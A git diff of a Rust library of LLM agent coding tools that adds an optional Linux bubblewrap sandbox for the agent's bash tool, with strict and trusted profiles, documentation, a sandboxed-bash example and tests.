`AllowedPathResolver` ```rust,no_run -use llm_coding_tools_serdesai::absolute::{ReadTool, WriteTool}; -use llm_coding_tools_serdesai::allowed::{ReadTool as AllowedReadTool, WriteTool as AllowedWriteTool}; +use 
llm_coding_tools_serdesai::absolute::{EditTool, ReadTool, WriteTool}; +use llm_coding_tools_serdesai::allowed::{EditTool as AllowedEditTool, ReadTool as AllowedReadTool, WriteTool as AllowedWriteTool}; use llm_coding_tools_serdesai::AllowedPathResolver; use std::path::PathBuf; @@ -82,13 +73,34 @@ let read = ReadTool::::new(); let allowed_paths = vec![PathBuf::from("/home/user/project"), PathBuf::from("/tmp")]; let resolver = AllowedPathResolver::new(allowed_paths).unwrap(); let sandboxed_read: AllowedReadTool = AllowedReadTool::new(resolver.clone()); +let sandboxed_edit = AllowedEditTool::new(resolver.clone()); let sandboxed_write = AllowedWriteTool::new(resolver); ``` -Other tools: `BashTool`, `WebFetchTool`, `TodoReadTool`, `TodoWriteTool`. - Use `SystemPromptBuilder` to track tools and generate context-aware prompts. Context strings are re-exported in `llm_coding_tools_serdesai::context` (e.g., `BASH`, `READ_ABSOLUTE`). +## Linux shell sandboxing + +Enable the `linux-bubblewrap` feature flag to use Linux `bwrap` sandbox profiles: + +```toml +[dependencies] +llm-coding-tools-serdesai = { version = "0.2", features = ["linux-bubblewrap"] } +``` + +Out of the box, two profiles are available: + +- **Public Bot**: Assumes anyone can call it, and thus defaults to the strictest containment. + - No full host filesystem access, synthetic home, memory-backed `/tmp`, network disabled, sanitized system `PATH`. +- **Trusted Maintenance**: Assumes work in a more trusted environment, e.g. maintaining codebases. + - Read-only host `/` with writable overlays, disk-backed `/tmp`, sanitized host `PATH`, network enabled. + +We default to the **Public Bot** profile when sandboxing is used. +In either case, trusted or not, please evaluate whether the solution fits your +security needs. I can make no guarantees. + +More info in [SANDBOX-PROFILES.md](https://github.com/Sewer56/llm-coding-tools/blob/main/SANDBOX-PROFILES.md). 
+ ## Agent Runtime For OpenCode-style agent support, use `AgentRuntimeExt` to build agents from an [`AgentRuntime`](https://docs.rs/llm-coding-tools-agents/latest/llm_coding_tools_agents/struct.AgentRuntime.html): @@ -164,6 +176,9 @@ cargo run --example serdesai-basic -p llm-coding-tools-serdesai # Sandboxed file access with allowed::* tools cargo run --example serdesai-sandboxed -p llm-coding-tools-serdesai +# Execution with Sandboxed `bash` +cargo run --example serdesai-sandboxed-bash --features linux-bubblewrap -p llm-coding-tools-serdesai + # Markdown agent runtime (no delegation) cargo run --example serdesai-agents -p llm-coding-tools-serdesai @@ -174,3 +189,5 @@ cargo run --example serdesai-task -p llm-coding-tools-serdesai ## License Apache 2.0 + +[llm-coding-tools]: https://github.com/Sewer56/llm-coding-tools diff --git a/src/llm-coding-tools-serdesai/examples/serdesai-agents.rs b/src/llm-coding-tools-serdesai/examples/serdesai-agents.rs index 9aec9d9e..8809bd49 100644 --- a/src/llm-coding-tools-serdesai/examples/serdesai-agents.rs +++ b/src/llm-coding-tools-serdesai/examples/serdesai-agents.rs @@ -16,7 +16,7 @@ use llm_coding_tools_serdesai::{AgentDefaults, AgentRuntimeExt}; use std::path::PathBuf; const AGENT_NAME: &str = "basic/file-reader"; -const MODEL_ID: &str = "synthetic/hf:zai-org/GLM-4.7"; +const MODEL_ID: &str = "synthetic/hf:zai-org/GLM-4.7-Flash"; const API_KEY_NAME: &str = "SYNTHETIC_API_KEY"; const API_KEY_VALUE: &str = ""; // <-- Set your API key here diff --git a/src/llm-coding-tools-serdesai/examples/serdesai-basic.rs b/src/llm-coding-tools-serdesai/examples/serdesai-basic.rs index 650f94ae..972299b6 100644 --- a/src/llm-coding-tools-serdesai/examples/serdesai-basic.rs +++ b/src/llm-coding-tools-serdesai/examples/serdesai-basic.rs @@ -7,6 +7,9 @@ //! - Running the agent with tools //! //! Run: cargo run --example serdesai-basic -p llm-coding-tools-serdesai +//! +//! 
Note: sandboxing is not enabled here; the agents are not restricted. +//! See the `serdesai-sandboxed` and `serdesai-sandboxed-bash` examples for sandboxed setups. use futures::StreamExt; use llm_coding_tools_serdesai::absolute::{GlobTool, GrepTool, ReadTool}; @@ -19,7 +22,7 @@ use std::fmt::Write; // Set your OpenAI API key here or via OPENAI_API_KEY environment variable. /// Fallback API key if env var is not set. Leave empty to require env var. const OPENAI_API_KEY: &str = ""; -const OPENAI_MODEL: &str = "hf:zai-org/GLM-4.7"; +const OPENAI_MODEL: &str = "hf:zai-org/GLM-4.7-Flash"; const OPENAI_BASE_URL: &str = "https://api.synthetic.new/openai/v1"; fn get_openai_api_key() -> String { @@ -45,7 +48,7 @@ async fn main() -> std::result::Result<(), Box> { .tool(pb.track(GlobTool::new())) .tool(pb.track(GrepTool::::new())) // Shell execution - .tool(pb.track(BashTool::new())) + .tool(pb.track(BashTool::host())) // Web content fetching .tool(pb.track(WebFetchTool::new())) // Todo tools with shared state diff --git a/src/llm-coding-tools-serdesai/examples/serdesai-sandboxed-bash.rs b/src/llm-coding-tools-serdesai/examples/serdesai-sandboxed-bash.rs new file mode 100644 index 00000000..8644ae5a --- /dev/null +++ b/src/llm-coding-tools-serdesai/examples/serdesai-sandboxed-bash.rs @@ -0,0 +1,136 @@ +//! Example with Sandboxed 'bash' tool using `bwrap` on Linux. +//! +//! Demonstrates explicit sandboxed shell execution with [`BashTool`] and a +//! `public_bot` bubblewrap profile, including one non-shell binary lookup. +//! +//! This example creates a `TempDir`-owned sandbox root with `home`, `cache`, +//! and `host-tmp` subdirectories. It bind-mounts `host-tmp` into sandbox +//! `/tmp`, and the whole tree is cleaned up when the `TempDir` drops at +//! process exit. +//! +//! Run: +//! `SYNTHETIC_API_KEY=... 
cargo run --example serdesai-sandboxed-bash --features linux-bubblewrap -p llm-coding-tools-serdesai` + +#[cfg(not(all(feature = "linux-bubblewrap", target_os = "linux")))] +fn main() -> Result<(), Box> { + eprintln!("This example requires Linux and the `linux-bubblewrap` feature."); + eprintln!( + "Run: SYNTHETIC_API_KEY=... cargo run --example serdesai-sandboxed-bash --features linux-bubblewrap -p llm-coding-tools-serdesai" + ); + Ok(()) +} + +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +#[tokio::main] +async fn main() -> Result<(), Box> { + use futures::StreamExt; + use llm_coding_tools_serdesai::agent_ext::AgentBuilderExt; + use llm_coding_tools_serdesai::{ + BashTool, SystemPromptBuilder, + profile::{Availability, Builder, TmpBacking}, + }; + use serdes_ai::prelude::*; + use serdes_ai_models::OpenAIChatModel; + use std::fmt::Write; + use std::fs; + + const API_KEY_NAME: &str = "SYNTHETIC_API_KEY"; + const API_KEY_VALUE: &str = ""; + const MODEL_ID: &str = "hf:zai-org/GLM-4.7-Flash"; + const BASE_URL: &str = "https://api.synthetic.new/openai/v1"; + + fn get_api_key() -> String { + std::env::var(API_KEY_NAME).unwrap_or_else(|_| API_KEY_VALUE.to_string()) + } + + fn log_xml(request_id: u32, tag: &str, content: &str) { + let mut line = String::with_capacity(content.len() + tag.len() * 2 + 18); + let _ = write!(line, "<{request_id}:{tag}>{content}"); + println!("{line}"); + } + + let api_key = get_api_key(); + if api_key.is_empty() { + eprintln!("Set {API_KEY_NAME} or edit API_KEY_VALUE before running this example."); + return Ok(()); + } + + let availability = Availability::detect(); + if let Some(reason) = availability.reason() { + eprintln!("bubblewrap is unavailable: {reason}"); + return Ok(()); + } + + let workspace = std::env::current_dir()?; + let sandbox_root = tempfile::Builder::new() + .prefix("llm-coding-tools-serdesai-sandboxed-bash-") + .tempdir()?; + let synthetic_home = sandbox_root.path().join("home"); + let cache_root = 
sandbox_root.path().join("cache"); + let host_tmp = sandbox_root.path().join("host-tmp"); + fs::create_dir_all(&synthetic_home)?; + fs::create_dir_all(&cache_root)?; + fs::create_dir_all(&host_tmp)?; + + let profile = Builder::public_bot( + &*workspace, + &*synthetic_home, + &*cache_root, + Some(TmpBacking::BindHost(host_tmp.clone().into_boxed_path())), + ) + .with_availability(availability) + .build()?; + + let bash = BashTool::host() + .with_linux_bwrap(profile) + .with_default_timeout(std::time::Duration::from_secs(20)) + .with_default_workdir(&workspace); + + let mut pb = SystemPromptBuilder::new().working_directory(workspace.display().to_string()); + let model = OpenAIChatModel::new(MODEL_ID, api_key).with_base_url(BASE_URL); + let agent = AgentBuilder::<(), String>::new(model) + .instructions( + "Use bash exactly once, rely on its output, and explain briefly why the result shows sandboxed execution.", + ) + .tool(pb.track(bash)) + .system_prompt(pb.build()) + .build(); + + println!( + "=== Sandboxed Bash Agent Ready ({} tools) ===", + agent.tools().len() + ); + println!("Profile: public_bot"); + println!("Workspace: {}", workspace.display()); + println!("Sandbox root: {}", sandbox_root.path().display()); + println!("Synthetic home: {}", synthetic_home.display()); + println!("Cache root: {}", cache_root.display()); + println!("Host tmp bound to /tmp: {}", host_tmp.display()); + + println!("\n=== Running Agent ==="); + let prompt = "Use bash exactly once to run `printf 'PWD=%s\\nHOME=%s\\nCAT=%s\\n' \"$PWD\" \"$HOME\" \"$(command -v cat)\" && printf 'hello-through-cat\\n' | cat` and then explain briefly why the result shows a sandboxed shell with an extra system binary available."; + let mut stream = agent.run_stream(prompt, ()).await?; + + let mut request_id = 0u32; + log_xml(request_id, "user", prompt); + request_id = request_id.saturating_add(1); + let mut assistant_message = String::with_capacity(256); + + while let Some(event) = stream.next().await { + 
match event? { + AgentStreamEvent::TextDelta { text, .. } => assistant_message.push_str(&text), + AgentStreamEvent::RequestStart { .. } => assistant_message.clear(), + AgentStreamEvent::ToolCallStart { tool_name, .. } => { + log_xml(request_id, "tool", &tool_name); + request_id = request_id.saturating_add(1); + } + AgentStreamEvent::ResponseComplete { .. } => { + log_xml(request_id, "assistant", &assistant_message); + request_id = request_id.saturating_add(1); + } + _ => {} + } + } + + Ok(()) +} diff --git a/src/llm-coding-tools-serdesai/examples/serdesai-sandboxed.rs b/src/llm-coding-tools-serdesai/examples/serdesai-sandboxed.rs index bdf05ec7..e62916a7 100644 --- a/src/llm-coding-tools-serdesai/examples/serdesai-sandboxed.rs +++ b/src/llm-coding-tools-serdesai/examples/serdesai-sandboxed.rs @@ -21,7 +21,7 @@ use std::fmt::Write; // Set your OpenAI API key here or via OPENAI_API_KEY environment variable. /// Fallback API key if env var is not set. Leave empty to require env var. const OPENAI_API_KEY: &str = ""; -const OPENAI_MODEL: &str = "hf:zai-org/GLM-4.7"; +const OPENAI_MODEL: &str = "hf:zai-org/GLM-4.7-Flash"; const OPENAI_BASE_URL: &str = "https://api.synthetic.new/openai/v1"; fn get_openai_api_key() -> String { diff --git a/src/llm-coding-tools-serdesai/examples/serdesai-task.rs b/src/llm-coding-tools-serdesai/examples/serdesai-task.rs index d30de4e8..a22c0489 100644 --- a/src/llm-coding-tools-serdesai/examples/serdesai-task.rs +++ b/src/llm-coding-tools-serdesai/examples/serdesai-task.rs @@ -21,7 +21,7 @@ use std::{ }; const AGENT_NAME: &str = "orchestrator"; -const MODEL_ID: &str = "synthetic/hf:zai-org/GLM-4.7"; +const MODEL_ID: &str = "synthetic/hf:zai-org/GLM-4.7-Flash"; const API_KEY_NAME: &str = "SYNTHETIC_API_KEY"; const API_KEY_VALUE: &str = ""; // <-- Set your API key here diff --git a/src/llm-coding-tools-serdesai/src/bash.rs b/src/llm-coding-tools-serdesai/src/bash.rs index fab06a40..5434debc 100644 --- 
a/src/llm-coding-tools-serdesai/src/bash.rs +++ b/src/llm-coding-tools-serdesai/src/bash.rs @@ -1,17 +1,42 @@ //! Shell command execution tool. //! -//! Provides cross-platform shell command execution with timeout support. +//! # Public API +//! +//! - [`BashTool::host`] — runs commands directly on the host shell. +//! - [`BashTool::new`] — backward-compatible alias for [`BashTool::host`]. +#![cfg_attr( + all(feature = "linux-bubblewrap", target_os = "linux"), + doc = "\ + - [`BashTool::with_linux_bwrap`] — runs commands inside a Linux bubblewrap sandbox.\n\ + \n\ + # Linux Sandbox Profiles\n\ + \n\ + On Linux with the `linux-bubblewrap` feature, commands can run \ + inside a bubblewrap sandbox. Two profile presets are available:\n\ + \n\ + - [`Builder::public_bot`](crate::profile::Builder::public_bot) — \ + strict isolation for untrusted input.\n\ + - [`Builder::trusted_maintenance`](crate::profile::Builder::trusted_maintenance) — \ + looser sandbox for build automation. Not safe against hostile commands.\n\ + \n\ + See the workspace guide at \ + \ + for full profile configuration and setup instructions." +)] use crate::convert::to_serdes_result; use async_trait::async_trait; use llm_coding_tools_core::context::{ToolContext, ToolPrompt}; use llm_coding_tools_core::tool_metadata::bash as bash_meta; -use llm_coding_tools_core::tools::execute_command; +use llm_coding_tools_core::tools::{BashExecutionMode, execute_command_with_mode}; use serde::Deserialize; use serdes_ai::tools::{RunContext, SchemaBuilder, Tool, ToolDefinition, ToolError, ToolResult}; use std::path::{Path, PathBuf}; use std::time::Duration; +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +use llm_coding_tools_bubblewrap::profile::{NetworkPolicy, Profile}; + /// Arguments for the bash tool. #[derive(Debug, Clone, Deserialize)] struct BashArgs { @@ -26,19 +51,46 @@ struct BashArgs { /// Tool for executing shell commands. /// /// Uses bash on Unix, cmd on Windows. 
-#[derive(Debug, Clone, Default)] +#[derive(Debug, Clone)] pub struct BashTool { + /// Explicit execution mode for this tool instance. + mode: BashExecutionMode, // ZST. 0 bytes when all optionals disabled. /// Default timeout for commands when not specified in args. default_timeout: Option, /// Default working directory when not specified in args. default_workdir: Option, } +impl Default for BashTool { + fn default() -> Self { + Self::host() + } +} + impl BashTool { /// Creates a new bash tool instance with default settings. + /// + /// This is an alias for [`Self::host`] for backward compatibility. + /// Prefer [`Self::host`] in examples so host execution stays explicit. #[inline] pub fn new() -> Self { - Self::default() + Self::host() + } + + /// Creates a bash tool that runs commands directly on the host shell. + /// On Linux with the `linux-bubblewrap` feature, call `with_linux_bwrap` instead + /// to sandbox commands. + pub fn host() -> Self { + Self { + mode: BashExecutionMode::Host, + default_timeout: None, + default_workdir: None, + } + } + + /// Returns the configured execution mode. + pub fn mode(&self) -> &BashExecutionMode { + &self.mode } /// Sets the default timeout for commands. @@ -56,6 +108,33 @@ impl BashTool { self.default_workdir = Some(workdir.into()); self } + + /// Runs commands inside a Linux sandbox using bubblewrap. + /// + /// Accepts an owned [`Profile`] or `Arc` to share one profile across + /// multiple tool instances. + /// + /// Build a profile with [`crate::profile::Builder::public_bot`] for untrusted input + /// or [`crate::profile::Builder::trusted_maintenance`] for build automation that + /// needs network access. Call [`crate::profile::Availability::detect`] at startup to + /// verify the sandbox is usable. + /// + /// # Platform + /// + /// Only available on Linux with the `linux-bubblewrap` feature enabled. 
+ /// + /// # Warnings + /// + /// Trusted-maintenance profiles allow network access and are not safe against + /// hostile commands. Pass only short-lived tokens via `with_extra_env` and + /// job-scoped read-only files via `with_credential_file_mounts`. Do not forward + /// SSH agents or mount full host credential stores. + /// + #[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] + pub fn with_linux_bwrap(mut self, profile: impl Into>) -> Self { + self.mode = BashExecutionMode::LinuxBwrap(profile.into()); + self + } } #[async_trait] @@ -88,6 +167,14 @@ impl Tool for BashTool { ) } + /// Executes a shell command through the configured [`BashExecutionMode`]. + /// + /// # Errors + /// + /// - [`ToolError::ValidationFailed`] if the JSON arguments fail deserialization. + /// - [`ToolError::ExecutionFailed`] if the command cannot be spawned, the per-command + /// workdir is invalid, or a timeout or I/O failure occurs while collecting + /// output. async fn call(&self, _ctx: &RunContext, args: serde_json::Value) -> ToolResult { let args: BashArgs = serde_json::from_value(args) .map_err(|e| ToolError::validation_error(bash_meta::NAME, None, e.to_string()))?; @@ -106,29 +193,67 @@ impl Tool for BashTool { .or(self.default_timeout) .unwrap_or(Duration::from_millis(bash_meta::DEFAULT_TIMEOUT_MS)); - let result = execute_command(&args.command, workdir, timeout).await; + // Route execution through mode-aware entrypoint to honor explicit mode selection + let result = execute_command_with_mode(&self.mode, &args.command, workdir, timeout).await; to_serdes_result(bash_meta::NAME, result.map(|output| output.format_output())) } } +#[inline] +fn bash_prompt_network_disabled(mode: &BashExecutionMode) -> bool { + #[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] + { + matches!( + mode, + BashExecutionMode::LinuxBwrap(config) + if matches!(config.network_policy(), NetworkPolicy::Disabled) + ) + } + + #[cfg(not(all(feature = "linux-bubblewrap", target_os = 
"linux")))] + { + let _ = mode; + false + } +} + +#[inline] +fn bash_prompt_sandboxed(mode: &BashExecutionMode) -> bool { + #[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] + { + matches!(mode, BashExecutionMode::LinuxBwrap(_)) + } + + #[cfg(not(all(feature = "linux-bubblewrap", target_os = "linux")))] + { + let _ = mode; + false + } +} + impl ToolContext for BashTool { const NAME: &'static str = bash_meta::NAME; fn context(&self) -> ToolPrompt { - ToolPrompt::Bash + ToolPrompt::Bash { + network_disabled: bash_prompt_network_disabled(&self.mode), + sandboxed: bash_prompt_sandboxed(&self.mode), + } } } #[cfg(test)] mod tests { use super::*; + use serial_test::serial; fn mock_ctx() -> RunContext<()> { RunContext::minimal("test-model") } #[tokio::test] + #[serial] async fn executes_echo() { let tool = BashTool::new(); let args = serde_json::json!({ @@ -140,6 +265,7 @@ mod tests { } #[tokio::test] + #[serial] async fn timeout_returns_error() { let tool = BashTool::new(); let cmd = if cfg!(target_os = "windows") { @@ -156,6 +282,7 @@ mod tests { } #[tokio::test] + #[serial] async fn workdir_parameter_changes_directory() { let temp = tempfile::TempDir::new().unwrap(); let temp_path = temp.path().to_string_lossy(); @@ -176,6 +303,7 @@ mod tests { } #[tokio::test] + #[serial] async fn default_workdir_is_used() { let temp = tempfile::TempDir::new().unwrap(); let temp_path = temp.path().to_string_lossy(); @@ -194,6 +322,7 @@ mod tests { } #[tokio::test] + #[serial] async fn per_call_timeout_overrides_default() { // Constructor sets 10s default, but per-call arg specifies 100ms let tool = BashTool::new().with_default_timeout(Duration::from_secs(10)); @@ -212,6 +341,7 @@ mod tests { } #[tokio::test] + #[serial] async fn default_timeout_used_when_arg_omitted() { let tool = BashTool::new().with_default_timeout(Duration::from_millis(100)); let cmd = if cfg!(target_os = "windows") { @@ -226,4 +356,29 @@ mod tests { let result = tool.call(&mock_ctx(), args).await; 
assert!(result.is_err()); } + + #[tokio::test] + #[serial] + async fn new_reports_host_mode_by_default() { + let tool = BashTool::new(); + assert!(matches!(tool.mode(), BashExecutionMode::Host)); + } + + #[tokio::test] + #[serial] + async fn bash_context_reports_host_mode() { + use llm_coding_tools_core::context::ToolPrompt; + + let host_tool = BashTool::new(); + assert!( + matches!( + host_tool.context(), + ToolPrompt::Bash { + network_disabled: false, + sandboxed: false, + } + ), + "host bash should report network_disabled: false, sandboxed: false" + ); + } } diff --git a/src/llm-coding-tools-serdesai/src/lib.rs b/src/llm-coding-tools-serdesai/src/lib.rs index cb5ee3b4..7a4384eb 100644 --- a/src/llm-coding-tools-serdesai/src/lib.rs +++ b/src/llm-coding-tools-serdesai/src/lib.rs @@ -15,6 +15,13 @@ pub mod webfetch; /// Re-export core types for convenience. pub use llm_coding_tools_core::{ToolError, ToolOutput, ToolResult}; +/// Re-export bash execution mode and mode-aware execution. +pub use llm_coding_tools_core::{BashExecutionMode, execute_command_with_mode}; + +/// Re-export preferred Linux bubblewrap profile types +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +pub use llm_coding_tools_bubblewrap::profile; + /// Re-export context module and [`ToolContext`] trait for convenience. pub use llm_coding_tools_core::ToolContext; pub use llm_coding_tools_core::context;